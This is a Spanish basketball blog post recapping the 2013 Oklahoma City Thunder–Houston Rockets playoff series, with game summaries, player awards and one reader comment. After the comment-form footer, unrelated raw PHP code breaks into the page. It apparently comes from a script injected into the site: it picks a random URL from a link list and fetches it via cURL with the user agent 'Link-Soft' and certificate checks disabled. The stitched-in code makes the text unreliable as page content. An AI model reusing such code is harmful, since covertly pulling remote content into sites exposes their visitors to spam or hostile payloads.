Resumen Oklahoma City Thunder 4 – Houston Rockets 2

04 de May de 2013 por Sancho88

Los Thunder están en Semifinales del Oeste tras una serie durísima contra los Rockets que se complicó mucho más de lo previsto. Y eso que tras el primer partido de la serie, en el que los Thunder ‘apalizaron’ por 30 puntos a los Rockets, todo el mundo pensaba que iba a ser un paseo. No obstante, Russell Westbrook se lesionó en el menisco derecho tras chocar con Patrick Beverley en el segundo partido de la serie y las alarmas se encendieron en la ciudad de las tormentas. 439 partidos consecutivos (entre Liga Regular y Playoffs) le contemplaban, pero estas lesiones siempre llegan en el peor momento. A partir de ahí, Houston se envalentonó. No tenían nada que perder, y a punto estuvieron de arañar algo en el Chesapeake en el segundo partido de la serie.

De hecho, ninguna victoria le salió barata a Oklahoma excepto la primera, y tuvieron que luchar hasta el final en todos los partidos. Esto les pasará factura a la larga, como comentábamos en el análisis. En una Conferencia Oeste que cada día está más complicada, si Oklahoma llega a las finales tiene toda la pinta de que lo harán extenuados.

El tercer partido bien pudo quedarse en casa para Harden. Con un tercer cuarto de escándalo en el que remontaron casi 20 puntos, un triple de Francisco García (genial durante toda la serie) a menos de un minuto para el final ponía contra las cuerdas a los Thunder, pero apareció la picadura letal de Durant (autor de 41 puntos en este partido), y entre Fisher y el ‘rookie’ hecho hombre Reggie Jackson remataron la faena. El pases a ‘semis’ estaba casi hecho. 

Pero pocos contaban con la lucha incansable de los Harden, Parsons, Beverley, y compañía. Y la iba a haber. Con un 3-0 dificilísimo de remontar (de hecho, imposible si tenemos en cuenta las estadísticas históricas de la NBA), estos muchachos se echaron el mundo a sus espaldas y decidieron liarla.

En el cuarto los Rockets salvaron el primer ‘matchball’. Sin Lin entre sus filas (que solo jugó tres partidos en la serie por una lesión en el pecho), y con un James Harden irreconocible (fallándolo absolutamente todo y perdiendo 10 balones), Chandler Parsons tuvo que salir al rescate, como apuntábamos en la previa. El alero de segundo año rozó el triple-doble (27-10-8) y estuvo muy bien secundado por Asik, que se comió a la pintura de Oklahoma, y, por supuesto, por Patrick Beverley, un novato que desató odios por la lesión a Westbrook, y que incluso fue amenazado de muerte. Seguro que nunca olvidará esta serie.

En el quinto Oklahoma tocó fondo, y muchos pensaron que Houston acabaría arrebatándole la eliminatoria a los Thunder. Entre Martin y Durant tiraron 13 triples pero solo anotaron 1, y a pesar del grandísimo esfuerzo de Reggie Jackson (que terminó el partido con 20 puntos), el quinteto de los Rockets conquistó por fin el Chesapeake con James Harden tocando la guitarra (31 puntos), y un inconmensurable Omer Asik que se volvió a ‘zampar’ al señor Kendrick Perkins (21-11). Ojito con Asik, porque ha hecho un temporadón y el año que viene tiene toda la pinta de seguir progresando.

Y llegamos por fin al sexto y último de la serie. Lin reapareció mermadísimo y Delfino se lo perdió por fractura en el pie derecho (aparecerá la próxima temporada). Con el 17-7 de inicio, los Rockets ya estaban soñando con forzar un épico séptimo partido, pero esta vez no hubo más espacio para soñar. Durant y Martin sí vieron cesta desde lejos, Reggie Jackson hizo olvidar a Westbrook rozando un triple-doble y el eterno Derek Fisher aprovechó su momento para anotar 8 puntos en el último cuarto; lo de siempre, nadie le defiende en condiciones y cuando dan por España las siete de la mañana, el tío decide aprovechar los huecos y meterlas tirando solo. Pasa todas las primaveras, pero aún así le siguen dejando tirar solo. Los rivales sabrán.

Después de esta eliminatoria, los Thunder se ven muy lejos de su objetivo, que no era otro que el anillo a principio de curso. Amanecerán cansados mañana contra Memphis, que también vienen cansados pero encendidos, y mucho tendrán que seguir ayudando Ibaka, Martin y Jackson, porque si no Durant puede quedarse sin finales. Por parte de los Rockets, su temporada solo puede calificarse con un sobresaliente, peleando todo lo peleable, aprovechando todos y cada uno de los movimientos salariales y encontrando un núcleo fuerte en torno a James Harden, con un Jeremy Lin que jugó muy bien la regular (aunque en Playoffs no apareció), y con escuderos de lujo como Parsons y Asik.

PREMIOS

MVP: Una vez más, ‘Durantula’ ha demostardo por qué muchos lo consideran como el mejor jugador de la NBA. Algún día le darán el `MVP’, tampoco está tan lejos de Lebron, pero de momento tiene que seguir escalando peldaños. Esta vez, sin la ayuda de su inseparable Westbrook, ‘KD’ llevó a sus Thunder en volandas. 32 puntos, 8 rebotes y 6 asistencias de media en toda la serie, y un esfuerzo titánico por llevar a sus compañeros a la siguiente ronda.

Sorpresa: Reggie Jackson. Algunos ya lo bautizan como mini-Westbrook. El espectacular base ha sido la ‘segunda espada’ del equipo ante la ausencia del propio Westbrook, promediando 14 puntos, 4 rebotes y 4 asistencias que muy pocos esperábamos. Lo apuntamos como clave en el análisis y cumplió de sobra. En los Rockets, Beverley y García doblaron sus números con respecto a la temporada regular y fueron muy valiosos en los dos partidos que ganaron los Rockets.

Decepción: Jeremy Lin. El base de Palo Alto estuvo desaparecido en la serie. En los tres partidos que jugó lo falló absolutamente todo (25% en TC) y Beverley y García tuvierorn que suplirlo. Su lesión en el pecho en el segundo partido lo excusa, pero los verdaderos cracks superan estas cosas.

Esfuerzo en vano: James Harden. El escolta de los Rockets jugó una serie muy especial. Se enfrentó a toda Oklahoma (incluso al señor gordo que era su amigo en la grada el año pasado) y con sus 26 puntos, 7 rebotes y 5 asistencias por partido demostró por qué muchos lo incluyen en el quinteto ideal de la temporada.

Comenta

Un comentario a esta entrada

  1. Jose Luis dice:
    #1

    Buen análisis sancho, creo que los Rockets merecieron forzar el septimo, aunque tambien oklahoma la cagó perdiendo el 5 en casa. Lin me da que no es un base para PO… Pero bueno, a ver como se mueven los Rockets en verano.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>